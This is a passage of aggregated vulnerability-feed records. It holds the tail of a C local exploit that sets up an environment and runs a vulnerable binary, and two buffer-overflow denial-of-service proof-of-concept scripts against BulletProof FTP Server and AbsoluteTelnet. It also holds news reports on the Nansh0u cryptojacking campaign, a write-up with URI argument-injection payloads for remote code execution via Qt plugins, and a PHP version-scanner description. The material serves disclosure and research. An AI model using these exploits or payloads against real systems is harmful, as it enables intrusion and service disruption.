*)ret);\r\n\r\n\t/* run the vulnerable program */\r\n\texecve(VULN, arg, env);\r\n\tperror(\"execve\");\r\n\texit(0);\r\n}\r\n\r\n/*\r\n * add_env(): add a variable to envp and pad if needed\r\n */\r\nint add_env(char *string)\r\n{\r\n\tint\ti;\r\n\r\n\t/* null termination */\r\n\tif (!string) {\r\n\t\tenv[env_pos] = NULL;\r\n\t\treturn(env_len);\r\n\t}\r\n\r\n\t/* add the variable to envp */\r\n\tenv[env_pos] = string;\r\n\tenv_len += strlen(string) + 1;\r\n\tenv_pos++;\r\n\r\n\t/* pad the envp using zeroes */\r\n\tif ((strlen(string) + 1) % 4)\r\n\t\tfor (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {\r\n\t\t\tenv[env_pos] = string + strlen(string);\r\n\t\t\tenv_len++;\r\n\t\t}\r\n\r\n\treturn(env_len);\r\n}\r\n\r\n/*\r\n * set_val(): copy a dword inside a buffer\r\n */\r\nvoid set_val(char *buf, int pos, int val)\r\n{\r\n\tbuf[pos] =\t(val & 0xff000000) >> 24;\r\n\tbuf[pos + 1] =\t(val & 0x00ff0000) >> 16;\r\n\tbuf[pos + 2] =\t(val & 0x0000ff00) >> 8;\r\n\tbuf[pos + 3] =\t(val & 0x000000ff);\r\n}\n\n# 0day.today [2019-05-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32716"}, {"lastseen": "2019-05-21T12:31:51", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "1337DAY-ID-32742", "href": "https://0day.today/exploit/description/32742", "title": "BulletProof FTP Server 2019.0.0.50 - (DNS Address) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: http://bpftpserver.com/\r\n#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download\r\n#Tested Version: 2019.0.0.50\r\n#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: BulletProof_DNS_Server_2019.0.0.50.py\r\n#2.- Open bullet_storage.txt and copy content to clipboard\r\n#3.- Open BulletProof FTP Server\r\n#4.- Select \"Settings\" > \"Protocols\" > \"FTP\" > \"Firewall\"\r\n#5.- Enable \"DNS Address\" and Paste Clipboard\r\n#6.- Click on \"Test\"\r\n#7.- Crashed\r\n\r\ncod = \"\\x41\" * 700\r\n\r\nf = open('bullet_dns.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-21] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32742"}, {"lastseen": "2019-05-21T12:32:37", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "1337DAY-ID-32741", "href": "https://0day.today/exploit/description/32741", "title": "AbsoluteTelnet 10.16 - (License name) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: https://www.celestialsoftware.net/\r\n#Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe\r\n#Tested Version: 10.16\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: AbsoluteTelent.py\r\n#2.- Open AbsoluteTelent.txt and copy content to clipboard\r\n#3.- Open AbsoluteTelnet.exe\r\n#4.- Select \"Help\" > \"Enter License Key\"\r\n#5.- In \"License Name\" paste Clipboard\r\n#6.- Crashed\r\n\r\ncod = \"\\x41\" * 2500\r\n\r\nf = open('AbsoluteTelent.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-21] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32741"}], "thn": [{"lastseen": "2019-05-29T20:20:24", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-w8yMV_WvSCw/XO7TRSK8nLI/AAAAAAAA0Es/eTXmXA_XMbEyYWU08TPZhPXsr7F2TOVigCLcBGAs/s728-e100/hacking-servers.jpg>)\n\nCyber Security researchers at Guardicore Labs today [published](<https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/>) a detailed report on a widespread cryptojacking campaign attacking Windows MS-SQL and PHPMyAdmin servers worldwide. \n \nDubbed **Nansh0u**, the malicious campaign is reportedly being carried out by an APT-style Chinese hacking group who has already infected nearly 50,000 servers and are installing a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated. \n \nThe campaign, which dates back to February 26 but was first detected in early-April, has been found delivering 20 different payload versions hosted on various hosting providers. \n\n\n \nThe attack relies on the brute-forcing technique after finding publicly accessible Windows MS-SQL and PHPMyAdmin servers using a simple port scanner. \n \nUpon successful login authentication with administrative privileges, attackers execute a sequence of MS-SQL commands on the compromised system to download malicious payload from a remote file server and run it with SYSTEM privileges. \n \nIn the background, the payload leverages a known privilege escalation vulnerability (CVE-2014-4113) to gain SYSTEM privileges on the compromised systems. \n \n\n\n> \"Using this Windows privilege, the attacking exploit injects code into the Winlogon process. The injected code creates a new process which inherits Winlogon SYSTEM privileges, providing equivalent permissions as the prior version.\"\n\n \nThe payload then installs a cryptocurrency mining malware on compromised servers to mine **TurtleCoin** cryptocurrency. \n\n\n \nBesides this, the malware also protects its process from terminating using a digitally-signed kernel-mode rootkit for persistence. \n \n\n\n> \"We found that the driver had a digital signature issued by the top Certificate Authority Verisign. The certificate \u2013 which is expired \u2013 bears the name of a fake Chinese company \u2013 Hangzhou Hootian Network Technology.\"\n\n \nResearchers have also released a complete [list of IoCs](<https://github.com/guardicore/labs_campaigns/tree/master/Nansh0u>) (indicators of compromise) and a free [PowerShell-based script](<https://github.com/guardicore/labs_campaigns/blob/master/Nansh0u/detect_nansh0u.ps1>) that Windows administrators can use to check whether their systems are infected or not. \n \nSince the attack relies on a weak username and password combinations for MS-SQL and PHPMyAdmin servers, admins are advised to always keep a strong, complex password for their accounts. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-05-29T18:53:49", "published": "2019-05-29T18:50:00", "id": "THN:2A7DE929E5909B366E6F490ABBF0A6C1", "href": "https://thehackernews.com/2019/05/hacking-mysql-phpmyadmin.html", "type": "thn", "title": "Hackers Infect 50,000 MS-SQL and PHPMyAdmin Servers with Rootkit Malware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-05-29T14:25:18", "bulletinFamily": "info", "description": "Up to 50,000 servers were infected over the past four months as part of a high-profile cryptojacking campaign, believed to orchestrated by Chinese-language adversaries.\n\nResearchers with Guardicore Labs, who disclosed the campaign Wednesday, said that the Nansh0u\u200b campaign (named due to a text file string in the attacker\u2019s servers being called Nansh0u) is \u201cnot another run-of-the-mill mining attack.\u201d\n\nThe cryptomining malware, which targets an open source cryptocurrency called [TurtleCoin](<https://turtlecoin.lol/>), is being spread via a sophisticated campaign relying on techniques often utilized by advanced persistent threat (APT) groups, such as using certificates and 20 different payload versions.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cBreached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors,\u201d researchers said in [an analysis](<https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger>). \u201cOnce compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.\u201d\n\n## The Campaign\n\nThe campaign has been ongoing since February, researchers said. In April, researchers noticed three similar attacks \u2013 all had source IP addresses originating in South Africa, shared the same attack process and used the same breach method.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/28170531/crypto-campaign.png>)\n\n\u201cLooking for more attacks with a similar pattern, we found attacks dating back to February 26, with over seven hundred new victims per day,\u201d said researchers. \u201cDuring our investigation, we found 20 versions of malicious payloads, with new payloads created at least once a week and used immediately after their creation time.\u201d\n\nThe campaign was rapidly infecting servers \u2013 in fact, within the timeframe of April 13 to May 13, researchers observed the number of infections double to 47,985.\n\nVictims were mostly located in China, the U.S. and India \u2013 however, attackers also reached victims in up to 90 countries, Guardicore researchers told Threatpost.\n\nResearchers also believe that China-linked attackers are behind the attack, as the hackers chose to write their tools with Chinese-based programming language EPL, and many log files and binaries on the servers included Chinese strings.\n\n## The Attack Process\n\nAttackers would seek out MS-SQL servers by scanning IP addresses for open MS-SQL ports. They then would use brute force methods to breach those exposed machines (using commonly-utilized credentials).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/28170700/crypto-campaign-2.png>)\n\n\u201cThe tool attempts to login to each MS-SQL server using tens of thousands of common credentials,\u201d researchers said. \u201cOnce authentication succeeds \u2013 the server\u2019s address, username and password are saved to a file for future use.\u201d\n\nFrom there, the bad actor logged into the victims\u2019 systems, execute MS-SQL commands on the machines, and download payloads and cryptocurrency miner malware from a remote file server.\n\nThe commands specifically execute a known privilege escalation exploit (CVE-2014-4113) that runs the malicious payload with SYSTEM privileges.\n\nResearchers also collected 20 payload samples from the attacker servers \u2013 all which had several functionalities, including the abilities to execute a crypto-currency miner and protect the miner process from termination through a kernel mode rootkit. Specifically, the closed-source JCE miner and open source XMRig miner were utilized to target the TurtleCoin cryptocurrency.\n\n\u201cThe attacker\u2019s overt goal was cryptomining,\u201d Daniel Goldberg, security researcher with Guardicore Lab, told Threatpost. \u201cThis is what takes up the victims\u2019 resources and directly generates money. A side goal is access. The attacker kept careful logs of breached servers that he could later reuse or sell.\u201d\n\nWhen asked how much the attackers were profiting from the cryptomining malware, researchers told Threatpost that TurtleCoin is a privacy oriented cryptocurrency, making it extremely difficult to get an accurate and reliable count of the amount in the wallet.\n\n## Sophisticated Arsenal\n\nThe campaign \u201cuses techniques often seen in APTs such as fake certificates and privilege escalation exploits,\u201d researchers said. \u201cWhile advanced attack tools have normally been the property of highly skilled adversaries this campaign shows that these tools can now easily fall into the hands of less than top-notch attackers.\u201d\n\nOne such technique is that many payloads in the campaign drop a kernel mode driver and used digital signatures to mask suspicious activity. Kernel-mode drivers are executable files run within the operating system\u2019s kernel. As such, they have high-privileged access to sensitive data structures and resources.\n\nThis particular driver had a digital signature issued by Certificate Authority Verisign. That certificate has the name of a fake Chinese company (Hangzhou Hootian Network Technology). Researchers contacted Verisign and informed them of the certificate resulting in the certificate being revoked.\n\nThe driver was also protected and obfuscated with VMProtect, a software tool \u201cthat attempts to frustrate reverse engineers and malware researchers,\u201d said researchers.\n\n## The Need for Strong Credentials\n\nResearchers pointed to weak authentication username and passwords on Windows MS-SQL servers as a main reason behind the attack \u2013 and urged system administrators to consider strong credentials.\n\n\u201cThis campaign demonstrates once again that common passwords still comprise the weakest link in today\u2019s attack flows,\u201d they said. \u201cSeeing tens of thousands of servers compromised by a simple brute-force attack, we highly recommend that organizations protect their assets with strong credentials as well as network segmentation solutions.\u201d\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-29T13:00:27", "published": "2019-05-29T13:00:27", "id": "THREATPOST:720727931BBA026660C91151A9F50C2F", "href": "https://threatpost.com/50k-servers-infected-with-cryptomining-malware-in-nansh0u-campaign/145140/", "type": "threatpost", "title": "50k Servers Infected with Cryptomining Malware in Nansh0u Campaign", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:09", "bulletinFamily": "unix", "description": "Kuang-che Wu discovered that GNU Screen improperly handled certain input. An attacker could use this issue to cause GNU Screen to crash, resulting in a denial of service or the execution of arbitrary code.", "modified": "2019-05-29T00:00:00", "published": "2019-05-29T00:00:00", "id": "USN-3996-1", "href": "https://usn.ubuntu.com/3996-1/", "title": "GNU Screen vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "myhack58": [{"lastseen": "2019-05-28T03:23:54", "bulletinFamily": "info", "description": "In the past month or so, I spent a lot of time to read and test custom URI Schemes to. As my previous post mentioned, not properly implemented a custom URI there may be many security issues. I mentioned\u201cmany\u201dof the word, here I want to EA Origin client, for example, to share with you this aspect of content. \nIn short, this article is about the Origin of another RCE vulnerability, not CVE-2019-11354\u3002 \n\n0x01 custom URI Schemes \nIn this article, we will take the Origin client for the study. However, this vulnerability also exists in many other applications, this technology that is not Origin specific. In order for us to better understand the exploit works, we need to understand Windows to custom URI Schemes. \nIf we in the registry to find the Origin of the URI Scheme, you can see the following information: \n! [](/Article/UploadPic/2019-5/201952871142641. png) \nFrom the above figure we can see the following data: \n\"C:\\Program Files (x86)\\Origin\\Origin.exe\" \"%1\" \nWhen we call the origin://, or origin2://when Windows will use ShellExecute()to generate a process, use our input data to replace the%1. \nFor example: origin://game/launch it will generate an Origin process, which command line parameters: \nC:\\Program Files (x86)\\Origin\\Origin.exe \"origin://game/launch\" \nIf we slightly read the official manual, on MSDN, search register custom URI Schemes, the relevant information, you can see Microsoft has tips some security. Officer online there are so a words: \nAs described above, is passed to be inserted into the protocols, pluggable protocol\uff09handler of the string may be truncated into multiple parameters. A malicious attacker could use the other quotation marks or backslash characters to bypass the other command line parameters. Therefore, the handler should assume that all command line parameters are possible from the attacker, care must be taken to handle these parameters. If the application may be executed based on the external data of the hazardous operation, then first of all it should be with the user to confirm these operations. In addition, responsible for the processing of these data the application should be directed to too long URI, or some non-expected or does not need the string sequence to be tested. \nThis means that the application needs to ensure that an attacker cannot through a carefully constructed URI to inject any illegal characters or parameters. \nBased on the URI of the use of technology historic \nIf you read this article, you know by the URI parameter injection is not a new technology. \nBefore some vulnerability in the URI, add an escape\"symbol, and thus from the%1 parameter in the escape. For example, in order to use the CVE-2007-3670 to inject the parameters, we just need to let remote users access to our carefully constructed the iframe and URI, it can be injected into the parameters to generate the target process. \nfirefoxurl://placeholder\" --argument-injection \nUsing only command injection is it enough? \nThis process involves the ShellExecute is called and the parameters passed way, we cannot be ultimately injected into their desired command, only the injection parameters. \n\n0x02 parameter injection \nLimited to most applications, browser, mail client, etc to the URI, parameter injection attacks in 2019 has become increasingly difficult to use. Modern browsers Chrome, Firefox, Edge on the deal link to some of the characters to force the encoding, which obviously will make the attacker more difficult to escape. \nHowever, if custom URI is not on the registry parameters for proper escape, we can directly use the space character to the injection parameters. \nRecent mIRC existence of such a vulnerability, in order to achieve RCE, an attacker would only need to use the following payload: \niframe src='irc://? -i\\\\\\127.0.0.1\\C$\\mirc-poc\\mirc. ini'> \nWe can refer here to learn more of the vulnerability discovery and use of the process. \nAnyway, for this article the study of the Origin case, we are ready to build a brand new installation of Windows 8 system, with IE11 browser, the latter will be discussed further bypassed modern security mechanisms in terms of relevant content. \nPayload \nStart the virtual machine, the installation of Origin. Open notepad, enter the following data: \niframe src='origin://?\" -reverse \"'> \nIn IE open, allowing the Origin to start, if IE will pop up a prompt box. We should see the following interface: \n! [](/Article/UploadPic/2019-5/201952871143478. png) \nAs shown above, the window icon now has to run to the other side. Here I forgot to mentioned that, the-reverse is a Qt specific one parameter. Origin mainly uses Qt framework for development, so I'd be tempted to try these parameters. \nIf we use Process Explorer to observe the process, you can see the following information: \n! [](/Article/UploadPic/2019-5/201952871143737. png) \nUnderstand the above information is enough to understand the parameters of the injection attack scenario. \n\n0x03 arbitrary code execution \nSo how do we use this to achieve code execution? In order to see which options are available, we need to understand how to use the parameter list. In the analysis of the Origin of their own parameters before we start to concern about Qt-specific parameters. \nView the Qt official documentation, shows that for all Qt app, we can use the following parameters: \n-platform \n-platformpluginpath \n-platformtheme \n-plugin \n-qmljsdebugger \n-qwindowgeometry \n-qwindowicon \n-qwindowtitle \n-reverse \n-session \n-display \n-geometry \nAmong the more noteworthy one parameter is platformpluginpath it. Through this parameter, we can specify Qt plugin loading path. These Qt plugin DLL files will then be loaded into the Origin and implementation. \nWe can use this behavior through a Windows share with platformpluginpath parameter for remote load plug-ins. \nQt official shows Qt plug-in and the corresponding list of directories. When using platformpluginpath parameters, a QGuiApplication will automatically load the following directory of the active DLL. \nThe base class \nDirectory \nQt module \nQAccessibleBridgePlugin \naccessiblebridge \nQt GUI \nQImageIOPlugin \nimageformats \nQt GUI \nQPictureFormatPlugin \npictureformats \nQt GUI \nQAudioSystemPlugin \naudio \nQt Multimedia \nQDeclarativeVideoBackendFactoryInterface \nvideo/declarativevideobackend \nQt Multimedia \nQGstBufferPoolPlugin \nvideo/bufferpool \nQt Multimedia \nQMediaPlaylistIOPlugin \nplaylistformats \nQt Multimedia \n\n\n**[1] [[2]](<94293_2.htm>) [[3]](<94293_3.htm>) [next](<94293_2.htm>)**\n", "modified": "2019-05-28T00:00:00", "published": "2019-05-28T00:00:00", "id": "MYHACK58:62201994293", "href": "http://www.myhack58.com/Article/html/3/62/2019/94293.htm", "title": "Talking about the URI Schemes of use-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kitploit": [{"lastseen": "2019-06-21T09:55:42", "bulletinFamily": "tools", "description": "[  ](<https://3.bp.blogspot.com/-bhtqXim-vlU/XNZVo27BruI/AAAAAAAAO4w/wqhBjqL6XlksqzL4vzGsPPETuwmPfvkRwCLcBGAs/s1600/php.png>)\n\n \n\n\nVersionscan is a tool for evaluating your currently installed PHP version and checking it against known CVEs and the versions they were fixed in to report back potential issues. \n\n** PLEASE NOTE: ** Work is still in progress to [ adapt ](<https://www.kitploit.com/search/label/ADAPT> \"adapt\" ) the tool to [ linux ](<https://www.kitploit.com/search/label/Linux> \"linux\" ) distributions that backport security fixes. As of right now, this only reports back for the straight up version reported. \n\n \n** Installation ** \n \n** Using Composer ** \n\n \n \n {\n \"require\": {\n \"psecio/versionscan\": \"dev-master\"\n }\n }\n\nThe only current dependency is the Symfony console. \n \n** Usage ** \nTo run the [ scan ](<https://www.kitploit.com/search/label/Scan> \"scan\" ) against your current PHP version, use: \n` bin/versionscan ` \nThe script will check the ` PHP_VERSION ` for the current instance and generate the pass/fail results. The output looks similar to: \n\n \n \n Executing against version: 5.4.24\n +--------+---------------+------+------------------------------------------------------------------------------------------------------+\n | Status | CVE ID | Risk | Summary |\n +--------+---------------+------+------------------------------------------------------------------------------------------------------+\n | FAIL | CVE-2014-3597 | 6.8 | Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP before 5.4.32 ... |\n | FAIL | CVE-2014-3587 | 4.3 | Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in... |\n\nResults will be reported back colorized as well to easily show the pass/fail of the check. \n \n** Parameters ** \nThere are several parameters that can be given to the tool to configure its [ scans ](<https://www.kitploit.com/search/label/Scans> \"scans\" ) and results: \n \n** PHP Version ** \nIf you'd like to define a PHP version to check other than the one the script finds itself, you can use the ` php-version ` parameter: \n\n \n \n bin/versionscan scan --php-version=4.3.2\n\n \n** Report Only Failures ** \nYou can also tell the versionscan to only report back the failures and not the passing tests: \n\n \n \n bin/versionscan scan --fail-only\n\n \n** Sorting results ** \nYou can also sort the results either by the CVE ID or by severity (risk rating), with the ` sort ` parameter and either the \"cve\" or \"risk\" value: \n\n \n \n bin/versionscan scan --sort=risk\n\n \n** Output formats ** \nBy default _ versionscan _ will output information directly to the console in a human-readable result. You can also specify other output formats that may be easier to parse programatically (like JSON). Use the ` --format ` option to change the output: \n\n \n \n vendor/bin/versionscan scan --php-version=5.5 --format=json\n\nSupported output formats are ` console ` , ` json ` , ` xml ` and ` html ` . \nThe HTML output format requires an ` --output ` option of the directory to write the file: \n\n \n \n vendor/bin/versionscan scan --php-version=5.5 --format=html --output=/var/www/output\n\nThe result will be written to a file named something like ` versionscan-output-20150808.html ` \n \n \n\n\n** [ Download Versionscan ](<https://github.com/psecio/versionscan> \"Download Versionscan\" ) **\n", "modified": "2019-05-21T21:17:08", "published": "2019-05-21T21:17:08", "id": "KITPLOIT:3928947731225997712", "href": "http://www.kitploit.com/2019/05/versionscan-php-version-scanner-for.html", "title": "Versionscan - A PHP Version Scanner For Reporting Possible Vulnerabilities", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
